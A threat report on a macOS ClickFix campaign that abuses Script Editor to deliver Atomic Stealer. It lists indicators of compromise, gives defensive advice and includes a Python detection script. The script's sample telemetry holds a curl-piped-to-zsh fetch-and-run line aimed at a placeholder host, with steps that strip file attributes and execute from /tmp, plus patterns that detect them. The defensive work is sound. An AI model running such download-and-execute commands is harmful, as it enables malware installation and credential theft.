Researchers at Jamf Threat Labs have uncovered a new ClickFix campaign targeting macOS users, marking a significant shift in attacker tactics. Instead of relying on Terminal commands, this variant leverages Script Editor to bypass Apple’s latest protections and deliver the Atomic Stealer infostealer.
How the Attack Works
- Fake Apple-themed webpage: Disguised as a disk cleanup utility, complete with step-by-step instructions mimicking legitimate macOS maintenance.
- Browser trick: Clicking “Execute” triggers the applescript URL scheme, prompting the browser to open Script Editor.
- Deceptive script: Script Editor displays a pre-populated script with fake Apple copyright headers, making it appear authentic.
- Execution chain:
  - An obfuscated command unscrambles into a malicious URL.
  - `curl -k` fetches the payload without TLS certificate validation.
  - The fetched content is piped into `zsh` and executed in memory.
  - A Mach-O binary (`helper`) is dropped in `/tmp`, stripped of its extended attributes, and executed.
- Payload: A recent Atomic Stealer variant that harvests browser credentials, saved passwords, crypto wallets, and sensitive data.
Indicators of Compromise
- Domains: dryvecar.com, storage-fixes.squarespace.com, cleanupmac.mssg.me
- Binary hash (SHA-256): 3d3c91ee762668c85b74859e4d09a2adfd34841694493b82659fda77fe0c2c44
Defensive Guidance
- Do not run scripts prompted by external webpages, even if branded with Apple logos.
- Decline browser requests to open Script Editor or automation tools from unknown sources.
- Keep macOS updated to ensure the latest built-in protections are active.
- Monitor for suspicious activity: shells spawned by Script Editor, obfuscated `curl` calls (especially with `-k`/`--insecure`) whose output is piped into a shell, and binaries dropped in and executed from `/tmp`.
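The execution chain above and the monitoring guidance in this section map cleanly onto a handful of process-telemetry rules. The following Python script is an added example, not code from Jamf Threat Labs or from the article: it runs those rules over a constructed set of macOS process events (the hostnames, PIDs and paths are made up, and the assumption that the attribute stripping is done with `xattr` is mine, since the article only says the binary is "stripped of attributes"). It flags shells spawned by Script Editor, `curl` invoked with `-k`/`--insecure`, remote content piped into a shell, `xattr` clearing attributes under `/tmp`, and execution from `/tmp`, and it escalates any hit whose process lineage leads back to Script Editor.

```python
import os
import re
from dataclasses import dataclass

SHELLS = {"zsh", "bash", "sh"}
TMP_DIRS = ("/tmp/", "/private/tmp/")
# "| zsh", "| /bin/sh", etc.: fetched content being handed straight to a shell
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/bin/)?(?:zsh|bash|sh)\b")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str    # executable path
    cmdline: str  # full command line as observed


# Constructed sample telemetry (hypothetical; example.invalid is not a real host).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "/Applications/Safari.app/Contents/MacOS/Safari", "Safari"),
    ProcEvent(101, 100, "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor",
              "Script Editor"),
    ProcEvent(102, 101, "/bin/zsh", 'zsh -c "curl -kfsSL https://example.invalid/payload | zsh"'),
    ProcEvent(103, 102, "/usr/bin/curl", "curl -kfsSL https://example.invalid/payload"),
    ProcEvent(104, 102, "/usr/bin/xattr", "xattr -c /tmp/helper"),
    ProcEvent(105, 102, "/tmp/helper", "/tmp/helper"),
    # Benign: curl with certificate validation intact, not under Script Editor.
    ProcEvent(200, 1, "/usr/bin/curl", "curl -fsSL https://example.invalid/ok.txt"),
]


def curl_insecure(cmd: str) -> bool:
    """True if any curl invocation in cmd disables TLS validation (-k or --insecure)."""
    in_curl = False
    for tok in cmd.split():
        if tok.strip('"\'') == "curl" or tok.endswith("/curl"):
            in_curl = True
            continue
        if not in_curl:
            continue
        if tok in ("|", ";", "&&", "||"):      # end of this curl command
            in_curl = False
            continue
        if tok == "--insecure":
            return True
        if tok.startswith("-") and not tok.startswith("--") and "k" in tok:
            return True                         # -k, possibly clustered like -kfsSL
    return False


def strips_attrs_in_tmp(cmd: str) -> bool:
    """xattr clearing all attributes (-c) or the quarantine flag on a path under /tmp."""
    toks = cmd.split()
    clears = "-c" in toks or ("-d" in toks and "com.apple.quarantine" in toks)
    return clears and any(t.startswith(TMP_DIRS) for t in toks)


def ancestry(events, pid):
    """Image basenames of the process's ancestors, nearest first (within the event set)."""
    by_pid = {e.pid: e for e in events}
    names, seen, cur = [], set(), by_pid.get(pid)
    while cur and cur.ppid in by_pid and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = by_pid[cur.ppid]
        names.append(os.path.basename(cur.image))
    return names


def evaluate(event: ProcEvent, events) -> list:
    """Rule names that fire for one event."""
    hits = []
    name = os.path.basename(event.image)
    parents = ancestry(events, event.pid)
    if name in SHELLS and parents[:1] == ["Script Editor"]:
        hits.append("script_editor_spawned_shell")
    if curl_insecure(event.cmdline):
        hits.append("curl_tls_validation_disabled")
    if PIPE_TO_SHELL.search(event.cmdline):
        hits.append("remote_content_piped_to_shell")
    if name == "xattr" and strips_attrs_in_tmp(event.cmdline):
        hits.append("xattr_stripped_in_tmp")
    if event.image.startswith(TMP_DIRS):
        hits.append("exec_from_tmp")
    # Escalate: any hit anywhere beneath Script Editor matches the described chain.
    if hits and "Script Editor" in parents:
        hits.append("lineage_script_editor")
    return hits


def detect(events) -> dict:
    """Map pid -> list of rule names, for events that fired at least one rule."""
    findings = {}
    for e in events:
        hits = evaluate(e, events)
        if hits:
            findings[e.pid] = hits
    return findings


if __name__ == "__main__":
    for pid, hits in detect(SAMPLE_EVENTS).items():
        print(pid, ", ".join(hits))
```

In the sample set only the four processes under Script Editor fire; the benign `curl -fsSL` at the end does not, because the rule keys on `-k`/`--insecure` rather than on `curl` itself. Any one of these rules on its own is noisy in a developer environment; the `lineage_script_editor` escalation is what turns them into a high-confidence signal for this particular chain.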
Final Thought
This campaign highlights how quickly attackers adapt to new defenses. Apple’s Terminal protections forced adversaries to pivot, and Script Editor became the new execution point. For macOS users, vigilance against social engineering is just as critical as technical safeguards — attackers exploit trust and routine system tasks to slip past defenses.